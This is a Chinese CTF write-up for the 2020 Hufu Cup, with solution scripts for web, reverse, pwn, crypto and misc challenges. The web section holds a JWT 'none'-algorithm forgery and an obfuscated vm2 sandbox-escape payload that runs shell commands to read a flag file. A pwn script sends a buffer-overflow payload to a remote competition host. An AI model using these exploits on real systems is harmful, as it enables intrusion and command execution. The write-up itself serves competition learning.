2020虎符杯wp

web

easylogin

可以看到这里jwt的key是无法控制的,那么就想办法让它为空,先注册一个账号,然后在伪造

1
2
3
4
5
6
7
const jwt=require('jsonwebtoken');
const secretid=[];
a=[]
const secret=secretid[a];
const username='admin';
const password='123456';
console.log(jwt.sign({secretid,username,password}, secret, {algorithm: 'none'}));

just_escape

直接上github找找看

https://github.com/patriksimek/vm2/issues/225

exp:

http://520a9401a13744a480ce9a58a8b10dfbc1e2bc9120b248f0.changame.ichunqiu.com/run.php?code=(function(){try{Buffer.from(new%20Proxy({},%20{getOwnPropertyDescriptor(){throw%20f=%3Ef[String.fromCharCode(99,111,110,115,116,114,117,99,116,111,114)](String.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115))();}}));}catch(e){return%20e(()=%3E{}).mainModule.require(String.fromCharCode(99,104,105,108,100,95,112,114,111,99,101,115,115))[`\x65\x78\x65\x63\x53\x79\x6e\x63`](`cat%20/flag`);}})()

babyupload

代码比较简单,简单说一下思路,覆盖session,用success.txt/来绕过呀,有个小坑,后端使用了php_binary,success.txt绕过原理

Re

enc

一个自创的对称加密算法

密钥根据一个seed随机生成,seed属于[0, 176],穷举所有密钥即可。在源程序打patch,输出全部密钥。

类似TEA,直接逆就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/local/bin/python3
from struct import unpack, pack
from binascii import unhexlify
def rol4(a, n):
a &= 0xffffffff
n %= 32
return 0xffffffff & ( (a << n) | ( a >> (32-n)) )

def ror4(a, n):
a &= 0xffffffff
n %= 32
return 0xffffffff & ( (a >> n) | ( a << (32-n)) )

res = unhexlify(b"AEED135CBDD2A1749C4C5E02D3289B60")
res = list(res)
tmp = []
for i in range(8):
tmp.append(res[2*i+1])
tmp.append(res[2*i])
res = bytes(tmp)
t0, t1, t2, t3 = unpack("<IIII", res)
t0 ^= 0x03020100
t1 ^= 0x07060504
t2 ^= 0x0b0a0908
t3 ^= 0x0f0e0d0c

def gensubkey(key):
i1 = 0
i2 = 0
j = 0
k = 0
subkey = []
t = 0x1234567
for i in range(44):
subkey.append(t&0xffffffff)
t-=0x76543211
key = list(unpack("<IIIIIIII", key))
for i in range(132):
tmp = rol4(i1+i2+subkey[j], 3)
# print(hex(tmp), hex((tmp+i2)&0xff))
subkey[j] = tmp & 0xffffffff
i1 = tmp
i2 = rol4(tmp+i2+key[k], (tmp+i2)&0xff)
key[k] = i2 & 0xffffffff
# print(hex(i2))
k = (k+1) % 8
j = (j+1) % 44
return subkey
keys = [b"24f6d8e83d1eb1819c7c818cc78ac5ca", b"1ebc4541e985d612a5ff7ed2ee92bf3d", b"9f30f3d1265389805615b2bfac36b1b6", b"d83a262fc46bd9c9d48ff14208ef17bc", b"ff6c1ad0012c285b3fc3f7a2ec1e8515", b"a0c883369ea35a7d06e9b6c8648ec4f6", b"ebb73611cd81e494049b5138ab56c37d", b"a512f8ffb2c1bb775a9779ec60b699cb", b"794c87696d24d16e7b9e3dddad778c93", b"9a30cb647a6bdd7b520ee3a072881d16", b"39d1fe72a8988665a94435426ad07fe8", b"2217d88875238732bf382b84bda50ba4", b"fb898edf3f2f1fac0efbb97fd2a178ea", b"e41c3e52832d1c2a80e60e327ccbe8fc", b"228f3022de3bc44ace8409f4f75f294e", b"d774d7687f27b3b0e50f31de114ca692", b"c4c43dcec6189ccb8122fd5fbf3f679c", b"332ce785e973574a1c5fdaf3eee3f083", b"cdc824bf721df654130ed7447fb878ac", b"50fb733a0a7e81934f8e99c3285487dc", b"fd63d016360b18a01ab74dcd01b5e32c", b"bb1ec476e023a45855e93a2feeb651e9", b"341ae4bffe82aa82798d3886484179a6", b"5a1033d131eee33a129900f2657732b4", b"7fae799db421e58f7c538357da6b8dee", b"d119fabe038bc5d0496051658fd205e6", b"55a33d5286c39dbf4c0c40dc4491f21e", b"4c4aff2e5de757833006d7f55c3f2127", b"d23f782f963f91a7aa724794ddb6294d", b"38d34384be6ff6461c84ff26069042bd", b"469b514b940da6314ca789f9b97af703", b"b47039e03ac46dbe9e223a120b6c6a73", b"6bee10c18c9358dc1a35eff2e11587d8", b"b6fd2bfc138be84b2100d83699157769", b"53276c24626a58a112bb69bf05add105", b"e7a3b473ffe1ef4cf33c715cca6eae97", b"0e3548246be44a5eb9768158cd083637", b"9fbff9e7c1d1481c63f04f4a78b4156d", b"6bf2656030beb31447c71e5263c6cf06", b"9fed75e6c5a25f8fb2d9c2abe8d3c545", b"e4200a8506e3cdd8580fa119ef435f09", b"d294eca22c3b9091d471f7da163d41e9", b"cd2b0237f80a9d79a1486b6ee132d6ff", b"386fd2f6eacab77d4b3f14fb95189d13", b"accdcfdc3907dec0252af4100727c00a", b"91a0edd6e84e27d8448f53c91e163bd4", b"cbcb73d49417b1a35bd3ab2570374644", b"a4fa3d275e7e2c5523457b30e49b60d5", b"fcbba4d117ea81a2dfaf224f4edddbb9", b"3042c7b494a4668a673a82c2e28f75b0", b"2e4d991ffdbf4604b402038117c90521", b"f57e60dbe1cff37162e4deb652c3f78c", b"2ece02377026fdd5b3b228a3eebfbbfb", b"0f93ee20c372b4d27241fd2959480dda", b"3687b18cdcc5c9097baa95ce26d4e8c6", b"c8b9c463c33c8b9b228a1a39f5d43dcb", b"ac70ec7446064f6ab45b75c6fd059595", b"c1f2be87d7ee98cff4abc33b3454a390", b"4e70f23d8e2bd7d7ccdb5b943084ebf6", b"f315aea87b5ec23e2e34512882e4c6b3", b"10845d3ec07425b5848d7c405dc2c433", b"3aec96904612449242ca6c30680e4cda", b"4c6ca9599ae456bbe0964c0bc09e6814", b"3c2e4fa4c911d1b9fabfb9acc5f5646f", b"c8bd1bb9dc6ed74f7b1ae209f8e9bb96", b"68632ca56c4dfb0fb5d90ee2591ee0e1", b"a88168ac6b518f4de53147a31e229362", b"f33ad94e6382a342a6fa2a77af19ea71", b"bec462f71f6f042733a7fb21711b6dc3", b"cfde6078bef18fad09f074c151dc6983", b"38e0aadb60c2448ca703803feb82717a", b"0c58033640292790e3c30df1f3a48af4", b"00730ac934636a0010ab81009f455f12", b"9c82e4b2f07420c375077ba99172bc90", b"723cd0d4f8c91f94717a8878952be710", b"dfcab32070773808d5a564b541347d26", b"c6bf3c5fcc74c7d539d53b361531ad25", b"a9f4fd43870cafe48173132b54a06685", b"f1bd55532e1360ca367bfcd11d9da1e8", b"2cb6e26375d9dd176cbbadcdfed1ef01", b"984d472aa8c899e093c8900099fea567", b"c5019c891096f4a2d1969e4700d59cf6", b"8e0b4935c723042b8e272a5f4af2bcbd", b"78c23c501b1459ebd4060308b1e3470a", b"80ae416a5467394ec9e8246c57204cba", b"bc17b303cea001efd0d73a0077f0ca8d", b"f8ead2e4e48e0e02ea7197a9bbb2e717", b"9ae78a13afa27e4108327f96e0d5181e", b"faa14910e8788ae4cd6bb892a3617f33", b"c868e13f49d85bd9f22a24d7aa918111", b"ed3d4c14b6a08c5f41bd2ca1a9dbfb1d", b"2467f3d0f807fddfb312592b0d430099", b"788e17b06c0974eaa751c2c94586010f", b"f9f296b5c47e8423fe341d760b0ecb68", b"1bee110aab230ee5c820643517373033", b"d1c96021f90f595526b0e206fac2bfca", b"9e164b670d6e9435e30302c79d7e67d4", b"33f81c781fb43df581546ba52280dc0d", b"85a585974adb486cd090331b321339cf", b"8db98fec25078c37dcbf049268c764b5", b"f944b1795f336fe9ec423bcf21284325", b"5cc8410e42c7263964b8015ea08362d4", b"34158d219951456236fb49551f7f5592", b"9180db15f09ef7202b9fcb275b0a0c6e", b"9c9d8c6de377d60214a77724713ae515", b"05376348208c8aa397de220ccf4f9ad9", b"fa98f3d30ebd1a6b2618f808e4e98a47", b"1746307dbbf1054a1d8135470b6ddec2", b"dd56281a2454dabd7034b59ec298abb1", b"0a6ffdd84329201f882a37527f1325c0", b"9a5b5bab8cd0298f97da3ec0fbfc4f78", b"7eb5e83cb47f481591e89d7f2f9342a1", b"30898358d9af658d9f7ca450e2a4e487", b"9083f61f5d8d2d07ad30651d053ca317", b"84c1f9bffeaf71dd48199ad9afc7df27", b"0d6cb90c9e5f6ddd1bd6177fd28b717d", b"c4339ee65d981686fa56a82b5ab7c73e", b"d8cbb9cc199f35d37f6c33f998cd6365", b"b79724b8ec63340311f48f3bf4c51bb0", b"f47ec82dca15926c01a929d8da16e1dd", b"197844ed6cd00d7af8b7ec94249d8ac3", b"4f08ee4a06e90d4c10b1da67c8c26015", b"0eb7d9649ad9559722f20fa89f9556f1", b"198c298aeaca5ba58cfaaa86ceb08824", b"e0169175017d91afeab5d903ba039c67", b"e0ff9d11b02d53ef10af40d08eb77770", b"5e0bd96491d6e6fed4bcba54b495cdf6", b"02cae11ff33401ef5500811e5b27018d", b"7a949f5ba0685bc8ba9b2a1ce3c07a33", b"fd4a545916cf5326043ae43aa9b07c62", b"fcfd4adedc3f975f105a37ce01ef4078", b"1d853fc037c09cb79fb2115c2cbe464a", b"20460f9f73163602c439e0dd557d6d18", b"fe4159237ae592cc882c0ebc61575252", b"ae0a5023804ad1a0efb7ed13499f41dc", b"8828be202b557cc22325bfa820a65ece", b"a1b94b750e5f26b59052bc4feb303636", b"40d2b2192df886ca7dd05e6cdc3d7d19", b"b6b943a74b6a4c0a2cb4e3c3302b0de1", b"e17c4d02eda594e904049871d221a0e1", b"7673d74b085d0912106a0251f51b6d23", b"a0e0a9164f619e659114a5abc73db665", b"fe0ae774f7c934ea135f37a52b219303", b"31054c4605dad50efec16fb4847f80af", b"d5b035067497b5d1fd5685d44df2c98c", b"7101a2fb7faf3bd54ea188912c35e285", b"90aeb01c7009c29bacd1ccdf9198200f", b"f09b0749f63e993af94531f6dbb51ad3", b"dda5608f9b02fa74d2021080e448c514", b"1c8c736e1e6cd1d55ac64f16308e5ec6", b"1a37cb862224bbef490c3b3ce39f30fa", b"e506c5d2e2016e03648bdeef447e9121", b"a7261b0be446888c6534ed4804d42eef", b"6eb945b94729b91786b1ff7e5ca14503", b"9af243c3650ffc485a37330f4a9c268a", b"afec290d9e26eda32e10aa1274803105", b"02d4e985c69172281e0406003fbabe14", b"4507c1663d08c9c8c8df1c2b9fbd71a9", b"037aee4d7df2b014d464a499343452f4", b"eb8c9f0afc38b58de0ede9016cbff20d", b"809b984e9737401afde6611e6825aaba", b"4a9da6e66ffa1e0e8373f78de018734b", b"b87f131f2a50058c4aae5d6878833bf0", b"3116bc3fec1e3da39b9b1d1024fd7908", b"a4ac2a59dfd9089eeffc7d5ba914b9f6", b"1021faa46d25b5eda7cfc3fa2cf3a761", b"e58bf62b5cd2598edfbba16473bddd2d", b"9ce2084127100a7fff7362ef98b86a1c", b"eadf54f1f347a3b3d77d3b8a97a21014", b"721c06b23bb82ed9d462b983018960bd", b"4e33c627548423e79c32c144fef410e7", b"6066c9ff564d883e3b4e5ed2b799744c", b"80715b87c5282b609426baa2a1b7547c", b"9b5bf4ffa9d46bb4926cee65b18d2804", b"29c71f391557af9da8a10c2f852bde4c", b"97fd6c7964b4b65c44521b4a1495c585", b"8d2ead53c70518308cff580ba835a718"]
save = t0, t1, t2, t3
for key in keys:
t0, t1, t2, t3 = save
subkey = gensubkey(key)
t0 -= subkey[42]
t2 -= subkey[43]
t0 &= 0xffffffff
t2 &= 0xffffffff

for i in range(20, 0, -1):
tmp0 = t0
tmp1 = t1
tmp2 = t2
tmp3 = t3
t2 = ror4(t1 - subkey[2*i+1], (rol4(tmp0*(2*tmp0+1), 5))) ^ rol4(tmp2*(2*tmp2+1), 5)
t0 = ror4(t3 - subkey[2*i], rol4(tmp2*(2*tmp2+1),5)) ^ rol4(tmp0*(2*tmp0 + 1), 5)
t1 = tmp0
t3 = tmp2
t2 &= 0xffffffff
t0 &= 0xffffffff
t1 -= subkey[0]
t3 -= subkey[1]
t1 &= 0xffffffff
t3 &= 0xffffffff
res = pack("<IIII", t0, t1, t2, t3)
print(res)

game

python的汇编代码,基于栈结构的,比较好理解。

加密部分不复杂,z3一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#/usr/local/bin/python
from z3 import *
arr0 = [249, 91, 149, 113, 16, 91, 53, 41]
arr1 = [43, 1, 6, 69, 20, 62, 6, 44, 24, 113, 6, 35, 0, 3, 6, 44, 20, 22, 127, 60]
arr2 = [90, 100, 87, 109, 86, 108, 86, 105, 90, 104, 88, 102]


s = Solver()
x = [BitVec('x%d'%i, 32) for i in range(39)]
s.add(x[0] == ord('f'))
s.add(x[1] == ord('l'))
s.add(x[2] == ord('a'))
s.add(x[3] == ord('g'))
s.add(x[4] == ord('{'))
s.add(x[5] == ord('5'))
s.add(x[38] == ord('}'))

a = x[6:30:3]
for i in range(len(a)):
s.add((a[i]*17684+372511)%257 == arr0[i])

b = x[-2:33:-1]*5
c = list(map(lambda y: y[0]^y[1], zip(b, x[7:27])))
for i in range(len(arr1)):
s.add(c[i] == arr1[i])
p = 0
for i in range(28,34):
s.add(((x[i]+107)/16)+77 == arr2[p])
s.add(((x[i]+117)%16)+99 == arr2[p+1])
p+=2
for i in x:
s.add(i<=127)
s.add(i>=32)
print(s.check())
m = s.model()
res = b""
for i in x:
res += bytes([m[i].as_long()])
print(res)

VM

基于两个栈结构的VM,加密比较简单。

z3一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/local/bin/python3
res = [ 0x66, 0x4E, 0xA9, 0xFD, 0x3C, 0x55, 0x90, 0x24, 0x57, 0xF6,
0x5D, 0xB1, 0x01, 0x20, 0x81, 0xFD, 0x36, 0xA9, 0x1F, 0xA1,
0x0E, 0x0D, 0x80, 0x8F, 0xCE, 0x77, 0xE8, 0x23, 0x9E, 0x27,
0x60, 0x2F, 0xA5, 0xCF, 0x1B, 0xBD, 0x32, 0xDB, 0xFF, 0x28,
0xA4, 0x5D]
from z3 import *
s = Solver()
x = [BitVec('x%d'%i, 32) for i in range(42)]
tmp = x[:]
for i in range(42):
s.add(x[i]<=127)
s.add(x[i]>=32)
s.add(x[0] == ord('f'))
s.add(x[1] == ord('l'))
s.add(x[2] == ord('a'))
s.add(x[3] == ord('g'))
s.add(x[4] == ord('{'))
# s.add(x[-1] == ord('}'))
x1 = [0 for i in range(42)]
# x = b"flag{123456789123456789123456789123456789}"
# x = list(x)
for i in range(7):
for j in range(6):
x1[j*7+i] = x[i*6+j] ^ (i*(j+2))
# print(x1)
# exit()
for i in range(1, 42):
if i % 2 == 0:
x1[i]+=x1[i-1]
x1[i] &= 0xff
else:
x1[i]*=0x6b
x1[i] &= 0xff

for i in range(42):
s.add(x1[i]==res[i])
print(s.check())
m = s.model()
res = b""
for i in tmp:
res+=bytes([m[i].as_long()])
print(res)

pwn

Count

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

p = remote("39.97.210.182",40285)

for i in range(200):
#sleep(1)
p.recvuntil("Math: ")
s = p.recvuntil("input answer:")
s = s.split(" = ")[0]
print(s)
r = eval(s)
p.sendline(str(r))

p.sendline("a"*0x64+p64(0x12235612))
p.sendline("icqd222c2ed094b0a9e849d151d35e16")

p.interactive()

misc

签到

F12拿到flag

Crypto

GM

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import sympy
from Crypto.Util.number import *

n=9433451661749413225919414595243321311762902037908850954799703396083863718641136503053215995576558003171249192969972864840795298784730553210417983714593764557582927434784915177639731998310891168685999240937407871771369971713515313634198744616074610866924094854671900334810353127446778607137157751925680243990905528141072864168544519279897224494849206184262202130305820187569148057247731243651084258194009459936702909655448969693589800987266378249891157940262898554047247605049549997783511107373248462587318323152524969684724690316918761387154882496367769626921299091688377118938693074486325995308403232228282839975697
phi=9433451661749413225919414595243321311762902037908850954799703396083863718641136503053215995576558003171249192969972864840795298784730553210417983714593764557582927434784915177639731998310891168685999240937407871771369971713515313634198744616074610866924094854671900334810353127446778607137157751925680243990711180904598841255660443214091848674376245163953774717113246203928244509033734184913005865837620134831142880711832256634797590773413831659733615722574830257496801417760337073484838170554497953033487131634973371143357507027731899402777169516770264218656483487045393156894832885628843858316679793205572348688820

p = sympy.symbols('p')
q = sympy.symbols('q')
res = sympy.solve([p*q-n, p+q-(n-phi+1)], (p, q))


p=100216711979082556377200124903474313599976321274816484378304672662900171906266478070844182716079881540999761528986068197079878654411887736955737660906283803174161740862819849415729979371880583995409044839777513091451849412985192528374337852907661670174530234397743068706607004213367391908429077794527921775907
q=94130524494940356506875940901901506872984699033610928814269310978003376307730580667234209640309443564560267414630644861712331559440658853201804556781784493376284446426393074882942957446869925558422146677774085449915333876201669456003375126689843738090285370245240893337253184644114745083294361228182569510971

d=[]
#d是enc,太长了放这里占地方

e = ((p-1)*(q-1)+4)//8
m = ""
for x in d:
k = pow(x, e, p*q)
if pow(k, 2, p*q) == x:
m += "0"
else:
m += "1"
print (m)
m=int(m,2)
print(long_to_bytes(m))